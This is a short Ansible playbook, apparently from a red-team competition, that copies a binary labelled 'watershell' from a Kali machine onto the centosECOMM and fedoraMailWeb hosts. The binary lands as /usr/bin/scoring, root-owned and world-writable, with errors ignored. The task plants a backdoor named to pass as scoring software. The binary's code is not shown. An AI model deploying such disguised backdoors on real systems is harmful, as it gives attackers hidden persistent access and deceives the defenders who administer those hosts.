- hosts: centosECOMM:fedoraMailWeb
  become: true
  ignore_errors: true
  tasks:
    - name: Copy watershell
      ansible.builtin.copy:
        src: /home/kali/zonifer/bins/scoring
        dest: /usr/bin/scoring
        owner: root
        group: root
        mode: '0777'

